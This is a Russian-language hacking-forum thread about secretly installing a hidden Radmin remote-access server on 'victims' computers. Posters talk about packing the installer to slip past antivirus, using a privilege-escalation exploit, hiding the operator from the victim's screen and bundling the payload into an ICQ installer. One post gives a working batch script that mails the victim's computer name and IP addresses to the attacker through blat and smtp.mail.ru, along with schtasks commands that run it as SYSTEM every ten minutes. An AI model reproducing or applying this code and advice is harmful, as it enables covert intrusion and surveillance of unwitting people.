Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Статьи", создана пользователем Iindigo, 16 дек 2010.

1. onthar
    onthar Продвинутый
    Симпатии:
    224
    Читайте внимательно тему, уже были такие вопросы.
    сплоит дает повышение прав, обойтись без него можно, но лучше тогда использовать вариант для windows XP. все есть в топике, читайте.

23 мар 2011
  2. Trainian
    Trainian Новичок
    Симпатии:
    0
    Так всё же ? кто-то спрячет от антивируса или нет ?! =)

24 мар 2011
  3. onthar
    onthar Продвинутый
    Симпатии:
    224
    нет, криптуйте самостоятельно

24 мар 2011
  4. shtabs
    shtabs Новичок
    Симпатии:
    0
    сборка заработала на oracul virtualbox,в настройках сети выставил мост,айпи отсылает на mail.ru...автору спасиба. Вопросец: как скрыть свое присутствие на мониторе жертвы(папки что я открываю в радмине открываются на мониторе жертвы(VBox))??

Последнее редактирование: 24 мар 2011
    24 мар 2011
  5. Trainian
    Trainian Новичок
    Симпатии:
    0
    Если бы умел... то не писал бы сюда и не просил этого сделать =)

Добавлено через 2 минуты
    папки будут в любом случае открываться.... т.к. это тоже самое управление компьютера... только удалённо... если тебе надо какие-то файлы конкретные скинуть или запустить то в радмине есть функции Telnet и Обмена файлами.

Последнее редактирование: 24 мар 2011
    24 мар 2011
  6. Iindigo
    Iindigo Guest
    shtabs, в радмине есть режим "Передача данных", с помощью которого можно работать с данными удаленного компьютера.

24 мар 2011
  7. aigera
    aigera Новичок
    Симпатии:
    3
    большинство людей уже за натом сидят тут радмин бесполезен

24 мар 2011
  8. shtabs
    shtabs Новичок
    Симпатии:
    0
    спасибо КЭП..

24 мар 2011
  9. aigera
    aigera Новичок
    Симпатии:
    3
    shtabs,
    если не трудно нажми + вместо спасибо Так путче

24 мар 2011
  10. IRAKLI2
    IRAKLI2 Новичок
    Симпатии:
    0
    не работает отправка по времени, ставлю через каждые 5 минут и ничего, пробовал по разному, топик весь перечитал
    schtasks /create /tn "security" /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM" /tr "%SYSTEMROOT%/ip.exe" и добовлял /f
    еще так
    schtasks /create /tn "security" /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM" /tr "C:\WINDOWS\ip.exe"
    даже слеш'и менял, при инсталяции ip приходит, а потом все тишина, если запускаю вручную C:\WINDOWS\ip.exe отправляет а автоматом по времени не хочет, в чем может быть дело?

28 мар 2011
  11. Iindigo
    Iindigo Guest
    В отключенной службе планировщика заданий.

28 мар 2011
  12. IRAKLI2
    IRAKLI2 Новичок
    Симпатии:
    0
    я на нее и грешил, спасибо! для тех, у кого не получается, все работает, ничего сложного нет, главное внимательно читать и желательно весь топик! У меня еще вопрос, как написать скрипт, чтоб при подключении интернета отправлял ip, т.е. если у жертвы VPN на компе, и он переподключился не перезагрузив комп, ip поменялся, нужно чтоб он сразу отправился на мыло. если ставить отправку по времени, например 5 минут, много мусора, если поставит 40 минут, он переподключился, а ip придет только через минут 40, не удобно
    Еще бы сделать чтоб локальный и внешний ip в одном письме приходили, а не по отдельности, уже поменьше мусора на мыле будет, я локальный убрал вообще, но иногда он тоже нужен
    PS. Iindigo не смог тебе поставить +, где балы указываются почему-то только ноль((

Добавлено через 9 часов 22 минуты
    немного пошевелил мозгами и гуглом, что получилось выкладываю

ip.bat
    Код:
    @echo off

:start
    ping ya.ru -n 5 >nul
    if %errorlevel%==0 (goto next) else (goto end)

:end
    goto start

:next

set mail=blat.exe -install -server smtp.mail.ru -port 25 -f МЫЛО@mail.ru -u ip-monitor -pw ПАСС ОТ МЫЛА
    set mail=blat.exe -to МЫЛО@mail.ru -subject "IP" -attachi "send.txt" -body "COMPUTER IP"

if not exist ipcfg1.txt (if not exist ipcfg3.txt del ipcfg3.txt ext3.txt > Echo %COMPUTERNAME% > ext1.txt & ipconfig /all > ipcfg1.txt &  findstr "IP-" ipcfg1.txt >> ext1.txt & realip.exe > realip1.txt >> ext1.txt) else  (goto test1)

:test1
    if exist ipcfg2.txt (goto test2) else (Echo %COMPUTERNAME% > ext2.txt & ipconfig /all > ipcfg2.txt &  findstr "IP-" ipcfg2.txt >> ext2.txt & realip.exe > realip2.txt >> ext2.txt)
    del ipcfg3.txt ext3.txt
    fc ext1.txt ext2.txt
    IF %ERRORLEVEL% == 1 (copy /y ext2.txt send.txt | %mail%)
    exit

:test2
    if exist ipcfg3.txt (goto test3) else (Echo %COMPUTERNAME% > ext3.txt & ipconfig /all > ipcfg3.txt &  findstr "IP-" ipcfg3.txt >> ext3.txt & realip.exe > realip3.txt >> ext3.txt)
    del ipcfg1.txt ext1.txt
    fc ext2.txt ext3.txt
    IF %ERRORLEVEL% == 1 (copy /y ext3.txt send.txt | %mail%)
    exit

:test3
    if exist ipcfg1.txt (goto test1) else (Echo %COMPUTERNAME% > ext1.txt & ipconfig /all > ipcfg1.txt &  findstr "IP-" ipcfg1.txt >> ext1.txt & realip.exe > realip1.txt >> ext1.txt)
    del ipcfg2.txt ext2.txt
    fc ext3.txt ext1.txt
    IF %ERRORLEVEL% == 1 (copy /y ext1.txt send.txt | %mail%)

Вкратце
    1. проверяет доступность интернета, если доступен отправляет ip
    2. проверяет LAN и WAN ip, сравнивает с предыдущим, если сменился отправляет, если остался прежний на почту ничего не приходит
    когда будите его криптовать, выставляем переключатель Visibility в Invisible Application, а переключатель Working Directory оставляем как есть(ВАЖНО, иначе ip будет приходить при каждом запуске, а не когда смениться)
    и напоследок в inst.cmd меняем
    Код:
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe

на
    Код:
    schtasks /create /tn security /sc minute /mo 10 /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe /f

время выставляем по желанию, я поставил 10 минут, через каждые 10 минут будут проверяться ip и если изменились, будут отправлены на мыло
    Все остальное делаем как в первом посте!
    PS. тестировал за пол дня не раз, все работает! inst.cmd использовал краха, взять можно тут

Последнее редактирование: 2 апр 2011
    28 мар 2011
  13. karencho
    karencho Новичок
    Симпатии:
    2
    люди добрый вечер ,можете подсказать как сделать доунлоадер?

30 мар 2011
  14. onthar
    onthar Продвинутый
    Симпатии:
    224
    скачать из раздела вирусологии. Тот бред, который белают из батника и wget несколько теряет смысл лоадера из-за своих размеров.

30 мар 2011
  15. gangkl
    gangkl Новичок
    Симпатии:
    0
    HELP, помогите, я установил ПК жертве радмин hide и пару раз уже коннектировался, кароче все работает. но мне приходиться каждый раз отправить ему файл в агенте, штобы узнат его IP. можно ли сделать так: когда жертва онлайн мне в мыло приходить собшения, новый IP address.! тогда все было би СУПЕР. видео можна по этой проблемы.? ато я буду глючит....

Последнее редактирование: 1 апр 2011
    1 апр 2011
  16. onthar
    onthar Продвинутый
    Симпатии:
    224
    из первого поста так и должно работать. почитай топик, выкладывали оптимизированные варианты с отправкой ip-адреса черз определенный промежуток времени.

ЗЫ.
    Учите русский, читать тяжело.

1 апр 2011
  17. nightserg
    nightserg Новичок
    Симпатии:
    0
    Автору + и спс за прогу и onthar за полезную инфу и советы ,всё быстро получилось,почитав тему и не флудя лишним! вот только вопрос,может и не в тему,подскажите пару прог чтоб сделать инсталятор (например совмещение получившегося архива, с icq ,всмысле при установке,icq установился бы и наш архив) если там будут какие-то нюансы,объясните если не трудно.

Последнее редактирование: 6 апр 2011
    6 апр 2011
  18. nightserg
    nightserg Новичок
    Симпатии:
    0
    и ещё один нюанс,у меня не моргает экран когда radm грузит вид.дрова при запуске ,тестил на виртуалке,и 3 тачках ось Win xp sp-3

з.ы. криптуй не криптуй=)Mалвар байтс ругается очень на него,почти на каждый .exe да и аутпост и Zema .Даже та 2ipstartquard не пропускает в бут=)

6 апр 2011
  19. dmitri44
    dmitri44 Новичок
    Симпатии:
    0
    Скажите, можно ли сделать, чтобы Касперский и Нод не находили вируса в программе. Программа работает на "Ура", но вот палится :((( Скажите, можно ли что-нибудь придумать?

14 апр 2011
  20. kirill456
    kirill456 Новичок
    Симпатии:
    0
    Cпс вообще норм только как сделать что бы не палился

18 апр 2011
Загрузка...